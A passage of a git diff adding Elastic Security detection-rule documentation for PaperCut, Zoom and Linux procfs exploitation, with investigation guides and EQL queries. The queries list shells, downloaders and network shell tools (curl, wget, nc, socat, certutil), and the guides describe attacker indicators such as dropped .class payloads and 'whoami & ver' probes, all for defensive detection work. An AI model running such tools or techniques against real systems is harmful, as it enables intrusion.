payloads. +- Escalate to incident response immediately if you confirm persistence in system-wide paths, evidence of lateral movement, tampering with security tooling, or the same Screen Sharing source interacting with any other macOS endpoints. +- Harden the environment by applying the vendor patch for CVE-2026-65400, disabling Screen Sharing where it is not required, restricting remote administration to approved management networks or VPN, and rotating passwords for any local or administrative accounts exposed on the host. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.process-* METADATA _id, _index, _version +| WHERE host.os.type == "macos" + AND event.type == "start" + AND process.name == "SSFileCopySender" + AND KQL(""" process.args : "0" AND process.args : "80" """) +| KEEP _id, _version, _index, + @timestamp, + data_stream.namespace, + host.name, + host.id, + user.id, + user.name, + process.name, + process.entity_id, + process.parent.name, + process.command_line +| SORT @timestamp DESC +| LIMIT 100 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-child-process-of-papercut-server-component.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-child-process-of-papercut-server-component.asciidoc new file mode 100644 index 0000000000..db72dbe25a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-child-process-of-papercut-server-component.asciidoc @@ -0,0 +1,227 @@ +[[suspicious-child-process-of-papercut-server-component]] +=== Suspicious Child Process of PaperCut Server Component + +Detects suspicious child process execution originating from PaperCut server components, including the PaperCut NG/MF Application Server (pc-app.exe) and PaperCut Hive print job spooler (pc-printjob-spooler.exe). Active exploitation of CVE-2026-82078 and CVE-2026-81578 abuses unsafe dynamic class loading and an authentication bypass to achieve pre-authenticated remote code execution under pc-app.exe. Similar suspicious shell spawning has also been observed from PaperCut Hive's pc-printjob-spooler.exe (for example cmd.exe executing echo/test-style commands). Observed NG/MF in-the-wild activity includes discovery utilities such as whoami and tasklist; proof-of-concept exploitation has spawned unexpected Windows utilities such as charmap.exe as SYSTEM. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* winlogbeat-* +* logs-windows.sysmon_operational-* +* logs-windows.forwarded* +* logs-system.security* +* endgame-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/ +* https://www.huntress.com/blog/papercut-actively-exploited + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Initial Access +* Tactic: Execution +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Sysmon +* Data Source: Windows Security Event Logs +* Data Source: Microsoft Defender XDR +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Child Process of PaperCut Server Component* + + +PaperCut NG/MF Application Server (`pc-app.exe`) and PaperCut Hive components such as `pc-printjob-spooler.exe` should +not routinely spawn interactive shells, download utilities, or discovery tools. CVE-2026-81578 (authentication bypass) +chained with CVE-2026-82078 (unsafe dynamic class loading) enables pre-authentication remote code execution under +`pc-app.exe`. Huntress observed short exploitation windows with base64-encoded commands such as `whoami & ver` and +`whoami & ver & tasklist`, and reproduced RCE that spawned `charmap.exe` as SYSTEM under `pc-app.exe`. Separate telemetry +has also shown `pc-printjob-spooler.exe` under `Program Files\PaperCut Hive\` launching `cmd.exe` with attacker- or +test-controlled command lines. + + +*Possible investigation steps* + + +- Review the parent-child chain: `process.parent.name`/`process.parent.executable` (for example `pc-app.exe` or + `pc-printjob-spooler.exe` under `PaperCut*` install paths); inspect child `process.name`, `process.executable`, and + `process.command_line` for shells, LOLBins, discovery tools, or trivial probing commands such as `echo test`. +- Confirm PaperCut product (NG/MF vs Hive), version, and internet exposure of management or print-related services. + Unpatched or publicly reachable servers are high priority. +- For NG/MF parents, search the same `host.id` for `.class` file creation under `server\lib` (for example `Udydn.class`, + `Moo97.class`) and related artifacts under `server\data\content` (`*.cmd`, `*.out`). +- Inspect PaperCut logs for hex-encoded payloads, base64 command strings, Derby boot messages referencing + `memory:...\pwn`, `jdbc:derby:memory:pwn`, `ERROR No suitable driver found for jdbc:no:x`, or truncated/deleted logs. +- Correlate with inbound web or print-service requests around `@timestamp` (proxy, WAF, firewall). +- Pivot on `user.id` and `host.id` for follow-on credential access, persistence, or lateral movement within 48 hours. + + +*False positive analysis* + + +- PaperCut upgrades, support tooling, or rare admin scripts might spawn expected helpers. Validate change windows, + signed binaries, and command lines before exceptioning. +- Do not exclude on `pc-app.exe` or `pc-printjob-spooler.exe` alone; require a stable benign child path and command pattern. + + +*Response and remediation* + + +- Isolate or restrict network access to the implicated PaperCut service immediately if public-facing. +- Preserve PaperCut logs, configuration, process trees from the parent binary, and any `.class`/`.cmd`/`.out` artifacts + before upgrade or reboot. +- Apply PaperCut Emergency Patch Release 2 (or newer fixed builds) for NG/MF, including site/secondary servers; validate + Hive component versions and vendor guidance for Hive-specific hosts. +- Hunt estate-wide for the same child-process and `.class` drop patterns; rotate credentials if compromise is confirmed. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +*Additional data sources* + + +This rule also supports the following third-party data sources. For setup instructions, refer to the links below: + +- https://ela.st/sysmon-event-1-setup[Sysmon Event ID 1 - Process Creation] +- https://ela.st/audit-process-creation[Windows Process Creation Logs] +- https://ela.st/m365-defender[Microsoft Defender XDR] +- https://ela.st/sentinel-one-cloud-funnel[SentinelOne Cloud Funnel] +- https://ela.st/crowdstrike-integration[CrowdStrike] + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("pc-app.exe", "pc-printjob-spooler.exe") and + ( + process.name : ( + "cmd.exe", + "powershell.exe", + "pwsh.exe", + "powershell_ise.exe", + "wscript.exe", + "cscript.exe", + "mshta.exe", + "rundll32.exe", + "regsvr32.exe", + "bitsadmin.exe", + "certutil.exe", + "curl.exe", + "wget.exe", + "net.exe", + "net1.exe", + "whoami.exe", + "tasklist.exe", + "ipconfig.exe", + "nltest.exe", + "systeminfo.exe", + "charmap.exe", + "calc.exe", + "mspaint.exe" + ) or + ?process.pe.original_file_name : ( + "Cmd.Exe", + "PowerShell.EXE", + "pwsh.dll", + "powershell_ise.EXE", + "wscript.exe", + "cscript.exe", + "MSHTA.EXE", + "RUNDLL32.EXE", + "REGSVR32.EXE", + "bitsadmin.exe", + "CertUtil.exe", + "curl.exe", + "wget.exe", + "net.exe", + "net1.exe", + "whoami.exe", + "tasklist.exe", + "ipconfig.exe", + "nltest.exe", + "systeminfo.exe", + "charmap.exe", + "CALC.EXE", + "mspaint.exe" + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-java-class-file-created-in-papercut-server-library.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-java-class-file-created-in-papercut-server-library.asciidoc new file mode 100644 index 0000000000..b0ef0f332a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-java-class-file-created-in-papercut-server-library.asciidoc @@ -0,0 +1,153 @@ +[[suspicious-java-class-file-created-in-papercut-server-library]] +=== Suspicious Java Class File Created in PaperCut Server Library + +Detects creation of Java .class files within the PaperCut NG/MF Application Server library directory. During active exploitation of CVE-2026-82078 (chained with CVE-2026-81578), attackers deliver hex-encoded malicious .class payloads into the PaperCut server/lib path (observed examples include Udydn.class and Moo97.class) so arbitrary bytecode executes inside the PaperCut JVM / Application Server process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: critical + +*Risk score*: 99 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/ +* https://www.huntress.com/blog/papercut-actively-exploited + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Initial Access +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Java Class File Created in PaperCut Server Library* + + +PaperCut NG/MF loads database/driver-related classes from the Application Server classpath. CVE-2026-82078 allows unsafe +dynamic class loading when configuration can be manipulated (enabled by CVE-2026-81578 authentication bypass). Huntress +recovered attacker `.class` files written under `server\lib` (for example `Udydn.class`, `Moo97.class`) that decoded +commands, wrote output under `server\data\content`, then deleted staging files and often `server.log`. + + +*Possible investigation steps* + + +- Inspect `file.path`, `file.name`, `file.size`, and writing `process.executable`/`process.name`. Unexpected short or + random `.class` names under `server/lib` are high confidence. +- On the same host, look for companion artifacts under `server/data/content` (`.cmd`, `.out`) and for suspicious + `pc-app.exe` / Java child processes (shells, `whoami`, `tasklist`, `charmap.exe`). +- Review PaperCut `server/logs` for hex-encoded blobs, base64 command strings, `jdbc:derby:memory:pwn`, Derby boot paths + containing `\pwn`, or `ERROR No suitable driver found for jdbc:no:x`. Note missing/truncated `server.log` files. +- Confirm whether a PaperCut upgrade or emergency patch was running at `@timestamp`; legitimate upgrades also write + many `.class` files under `server/lib`. +- Scope other PaperCut servers for the same file names/paths and review internet exposure of the management interface. + + +*False positive analysis* + + +- PaperCut installation, upgrade, and emergency patch operations legitimately create `.class` files under `server/lib`. + Correlate with change tickets, installer process names, and volume of writes before treating as malicious. +- Exclude only tightly scoped upgrade processes/paths after validation; do not blanket-exclude the `server/lib` directory. + + +*Response and remediation* + + +- Restrict public access to the PaperCut Application Server immediately. +- Preserve `server/lib` `.class` files, `server/logs`, `server/data/content`, and process telemetry before cleanup or patch. +- Remove unauthorized `.class` payloads after evidence collection; apply PaperCut Emergency Patch Release 2 (or newer). +- Hunt for related child-process activity from `pc-app.exe` and rotate credentials if exploitation is confirmed. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type in ("windows", "linux", "macos") and + event.action in ("creation", "overwrite") and + file.extension : "class" and + file.path : ( + "?:\\Program Files\\PaperCut*\\server\\lib\\*", + "?:\\Program Files (x86)\\PaperCut*\\server\\lib\\*", + "/opt/papercut/server/lib/*", + "/usr/local/papercut/server/lib/*", + "/Applications/PaperCut*/server/lib/*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Reflective Code Loading +** ID: T1620 +** Reference URL: https://attack.mitre.org/techniques/T1620/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-proc-maps-discovery.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-proc-maps-discovery.asciidoc index 45ab42f1f5..e88fd2e211 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-proc-maps-discovery.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-proc-maps-discovery.asciidoc @@ -42,7 +42,7 @@ Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a * Data Source: SentinelOne * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -150,7 +150,9 @@ not ( ?process.parent.name == "uac" or ?process.parent.executable in ("/opt/secl/linux-ir-scripts-v3/thieves.sh", "/opt/traps/rpm-installer/setup.sh") or ?process.working_directory like ("/opt/traps/deb-installer", "/opt/Tanium/TaniumClient/*") or - ?process.parent.executable like ("/home/*/sunlight/thieves.sh") + ?process.parent.executable like ("/home/*/sunlight/thieves.sh") or + (?process.parent.executable == "/usr/lib/systemd/systemd" and ?process.parent.command_line == "/sbin/init") or + ?process.group_leader.executable in ("/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent", "/opt/traps/bin/cytool") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-by-zoom.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-by-zoom.asciidoc new file mode 100644 index 0000000000..5b21e2466b --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-process-execution-by-zoom.asciidoc @@ -0,0 +1,202 @@ +[[suspicious-process-execution-by-zoom]] +=== Suspicious Process Execution by Zoom + +Identifies suspicious process execution associated with the Zoom desktop client on macOS and Linux. The rule detects shells, script interpreters, downloaders, and network utilities spawned by Zoom on either platform. On Linux, it also detects Zoom replacing its own process image with an executable outside the Zoom installation directory. These behaviors may indicate successful exploitation of a Zoom client vulnerability, including CVE-2026-53413. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://a.security/blog/asecurity-zoomsday +* https://www.zoom.com/en/trust/security-bulletin/zsb-26015/ +* https://www.securityweek.com/zoom-patches-zero-click-code-execution-vulnerability/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Execution +* Data Source: Elastic Defend +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Process Execution by Zoom* + + +CVE-2026-53413 is a buffer overwrite in Zoom's annotation parser that can allow a meeting participant to execute code +on another participant's device. The published macOS exploit replaced the running `zoom.us` process image with Safari +using `execvp`. Other payloads may instead spawn a shell, interpreter, downloader, or network utility. This rule detects +suspicious Zoom child processes on macOS and Linux and in-place Zoom process-image replacement on Linux, where Elastic +Defend records the prior image in `process.previous.executable`. The Linux logic identifies the Zoom executable +regardless of its installation path. + + +*Possible investigation steps* + + +- Determine which branch matched. For a child process, verify that `process.parent.executable` is the genuine Zoom + client. For Linux image replacement, compare `process.previous.executable` with `process.executable` and review the + new image's path, hash, arguments, and provenance. The image-replacement branch excludes direct Zoom children because + `process.previous.executable` includes the image inherited at fork as well as subsequent executions. +- Review the process command line and arguments for payload download, shell commands, persistence, credential access, + discovery, or outbound connection activity. +- Use `process.entity_id` and `process.parent.entity_id` to examine related process, file, and network events before and + after the alert. Look for additional payloads, persistence changes, credential access, and communication with + untrusted destinations. +- Confirm the installed Zoom version and whether it was vulnerable at the alert time. Zoom Workplace releases before + `7.1.5` and `7.0.6` in their respective branches are affected by CVE-2026-53413. +- Establish whether the user was in a Zoom meeting near the alert time. Preserve the meeting UUID and occurrence, + participant report, client version, join and leave times, screen-sharing state, and available Zoom client logs. +- Review crash diagnostics for annotation-library faults or memory-corruption indicators near the alert. A crash alone + is not sufficient evidence of exploitation. +- Check for other alerts on the host and for similar activity involving the same meeting participants or source + infrastructure. + + +*False positive analysis* + + +- Zoom may invoke legitimate support, diagnostic, accessibility, update, or enterprise-management tooling. Validate the + binary's signature, path, command line, prevalence, and relationship to an approved workflow. +- Zoom performs Linux startup checks through a shell, including audio, graphics, desktop portal, and process-limit + discovery. The known commands are excluded by this rule; investigate variations or additional chained commands. +- Opening authentication or meeting links normally uses an operating-system broker and should not require Zoom to spawn + a shell or replace its own image. Treat direct shell, interpreter, or downloader execution as suspicious unless a + specific benign workflow is confirmed. + + +*Response and remediation* + + +- If exploitation is suspected, isolate the host and preserve process, file, network, crash, Zoom client, and meeting + audit evidence before terminating processes or reimaging. +- Update Zoom to a fixed release and enforce minimum client versions. Until vulnerable clients are removed, disable + end-to-end encryption so Zoom's server-side annotation filtering can inspect meeting content. +- Restrict meeting access with waiting rooms, passcodes, and authenticated-user requirements, and disable unnecessary + annotation, whiteboarding, remote-control, file-transfer, and participant screen-sharing features. +- Remove malicious artifacts and persistence, rotate credentials accessible to the compromised user or process, and + investigate other participants and endpoints associated with the meeting. + + +==== Setup + + + +*Setup* + + +This rule requires process events from Elastic Defend on macOS or Linux. + +Elastic Defend is integrated into the Elastic Agent using Fleet. Configure the integration to collect process events +from protected endpoints. The Linux image-replacement branch requires `process.previous.executable`, which Elastic +Defend provides on Linux `exec` process events. + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and event.action == "exec" and + ( + ( + host.os.type == "linux" and + process.previous.executable : "*/zoom" and + not process.executable : "*/zoom" and + not process.parent.name : "zoom" + ) or + ( + host.os.type in ("macos", "linux") and + ( + (host.os.type == "macos" and + process.parent.executable : "*/zoom.us.app/Contents/MacOS/zoom.us") or + (host.os.type == "linux" and + process.parent.name : "zoom") + ) and + process.name : ( + "sh", "bash", "zsh", "dash", "ksh", "fish", "ash", "mksh", "tsh", "tcsh", "pwsh", + "python*", "perl*", "ruby*", "php*", "lua*", "node", "nodejs", "osascript", + "curl", "nscurl", "wget", "nc", "ncat", "netcat", "netcat.openbsd", "netcat.traditional", + "nc.openbsd", "nc.traditional", "socat", "openssl", + "chmod", "xattr" + ) and + not ( + host.os.type == "linux" and process.name in ("sh", "bash") and + process.args : ( + "lspci", + "pacmd --version", + "pacmd list-sinks |grep 'name:\\|module:'", + "pipewire --version", + "ls /usr/share/xdg-desktop-portal/portals/", + "/usr/libexec/xdg-desktop-portal --version", + "cat /proc/sys/kernel/pid_max" + ) + ) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: AppleScript +** ID: T1059.002 +** Reference URL: https://attack.mitre.org/techniques/T1059/002/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-reading-of-procfs-syscall-file.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-reading-of-procfs-syscall-file.asciidoc new file mode 100644 index 0000000000..c5cf51b9fd --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-reading-of-procfs-syscall-file.asciidoc @@ -0,0 +1,131 @@ +[[suspicious-reading-of-procfs-syscall-file]] +=== Suspicious Reading of procfs Syscall File + +This rule detects command lines that reference another process or thread's procfs syscall file. The "/proc//syscall" interface exposes the current syscall arguments, stack pointer, and instruction pointer, which can support process discovery and preparation for process injection. Self and thread-self aliases are excluded. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://man7.org/linux/man-pages/man5/proc_pid_syscall.5.html +* https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Platform: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Reading of procfs Syscall File* + + +This rule detects Linux utilities reading another process or thread’s `/proc//syscall` file, which exposes its active system call, arguments, stack pointer, and instruction pointer and can support process discovery or injection preparation. An attacker may repeatedly run `cat /proc/1234/syscall` to inspect a privileged service’s execution state before selecting it as an injection target. + + +*Possible investigation steps* + + +- Resolve the referenced PID to its executable, owner, privileges, container or namespace, and service role to determine why it was targeted. +- Review the reader’s full command line, parent process, user, working directory, executable path, hash, signature, and surrounding process tree for evidence of scripts, shells, or unauthorized tooling. +- Correlate nearby activity for repeated procfs enumeration, `ptrace` use, debugger attachment, access to `/proc//mem` or `/proc//maps`, suspicious signal delivery, and credential or privilege changes. +- Compare the activity with host baselines and approved monitoring or troubleshooting workflows, then examine whether the same user, binary, or command pattern appears on other systems. +- If unexplained or malicious, isolate the host, preserve process and audit telemetry, terminate unauthorized processes, revoke exposed credentials, and investigate the initial access and persistence mechanism. + + +*False positive analysis* + + +- An administrator troubleshooting a stalled or high-resource process may read its `/proc//syscall` file; confirm the target PID, initiating user, parent shell, timing, and alignment with an approved support activity. +- An authorized diagnostic or monitoring script may periodically inspect process syscall state using standard Linux utilities; verify the script path, owner, execution schedule, expected target processes, and consistency with the host’s established baseline. + + +*Response and remediation* + + +- Isolate the affected Linux host or container while preserving volatile evidence, including the reader process, targeted PID, process tree, open files, network connections, and relevant `/proc` artifacts. +- Terminate unauthorized processes and remove persistence associated with the activity, including malicious systemd units, cron entries, shell startup modifications, container hooks, kernel modules, and altered binaries. +- Revoke credentials or tokens accessible to the implicated accounts and processes, rotate affected secrets, and review privileged accounts for unauthorized SSH keys or sudo configuration changes. +- Escalate immediately to incident response if the activity includes `ptrace`, access to `/proc//mem` or `/proc//maps`, code injection indicators, privileged-process targeting, credential theft, or similar behavior on multiple systems. +- Rebuild compromised hosts or containers from verified images, restore validated data and configuration, patch exploited software, and confirm that unauthorized files, processes, accounts, and connections are absent before reconnecting them. +- Harden the environment by restricting procfs visibility with `hidepid`, enforcing least privilege and ptrace restrictions, strengthening SELinux or AppArmor policies, limiting debugging tools, and monitoring repeated access to other processes’ procfs files. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2") and +( + process.name in ( + "cat", "less", "more", "head", "tail", "nano", "vi", "vim", "strings", "nvim", "vim.basic", + "vim.tiny", "od", "hexdump", "xxd", "hx", "hexedit", "pager", "tr" + ) or + ( + process.name in ( + "find", "awk", "gawk", "mawk", "nawk", "grep", "fgrep", "rgrep", "xargs", "sed", "tee" + ) and + process.args_count <= 20 + ) +) and +process.command_line like "*/proc/*/syscall*" and +not ( + process.command_line like ("*/proc/self/syscall*", "*/proc/thread-self/syscall*") or + process.args like "/proc/*/syscall/comm" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Process Discovery +** ID: T1057 +** Reference URL: https://attack.mitre.org/techniques/T1057/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-web-browser-sensitive-file-access.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-web-browser-sensitive-file-access.asciidoc index da412cc611..dafbfcbbe4 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-web-browser-sensitive-file-access.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-web-browser-sensitive-file-access.asciidoc @@ -32,11 +32,12 @@ Identifies the access or file open of web browser sensitive files by an untruste * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 215 +*Version*: 216 *Rule authors*: * Elastic +* Massimo Bertocchi *Rule license*: Elastic License v2 diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-file-creation-via-web-server.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-file-creation-via-web-server.asciidoc index 5d576aba0e..b0dcf6a732 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-file-creation-via-web-server.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-file-creation-via-web-server.asciidoc @@ -34,7 +34,7 @@ This rule leverages the "new_terms" rule type to detect unusual file creations o * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -63,7 +63,7 @@ This alert flags a Linux web server process creating or renaming a file in web c - Determine whether the file aligns with an approved deployment, plugin or theme update, package installation, or administrator change in the same time window by reviewing change records and system update history. - Inspect the file contents, hash, ownership, permissions, and timestamps for signs of a web shell, dropped payload, hidden redirect, or script stager, and compare it with known-good application files from the same host or image. -- Review the web service’s parent and child activity around the event for spawned shells, interpreters, archive extraction, or permission changes that would indicate exploitation followed by payload execution or persistence setup. +- Review the web service's parent and child activity around the event for spawned shells, interpreters, archive extraction, or permission changes that would indicate exploitation followed by payload execution or persistence setup. - Correlate nearby web access, reverse-proxy, and application log events to identify suspicious upload, template-edit, admin-panel, deserialization, or remote-code-execution requests immediately before the file appeared and any follow-up requests to the new file. - Scope the compromise by searching the host and peer web servers for similarly named files, unexpected cron or systemd persistence, modified startup scripts, or outbound connections made by the web service account after the creation event. @@ -110,7 +110,7 @@ event.category:file and host.os.type:linux and event.action:(creation or rename) (process.name: lua* and file.extension: ("lua" or "luac")) ) and file.path:( - /home/*/* or /var/www/* or /srv/www/* or /srv/http/* or /usr/share/nginx/* or /var/lib/nginx/* or + /home/*/* or /var/www/* or /srv/www/* or /srv/http/* or /usr/share/nginx/* or /opt/zimbra/jetty* or /usr/share/caddy/* or /usr/local/lsws/* or /opt/bitnami/* or */sites/*/files/* or /opt/easyengine/* or */wp-content/* or */httpdocs/* or */httpsdocs/* or */htdocs/* or */wwwroot/* or */webroot/* or */cgi-bin/* or */upload/* or */uploads/* or */images/* or */media/* or */userfiles/* or */attachments/* or @@ -123,7 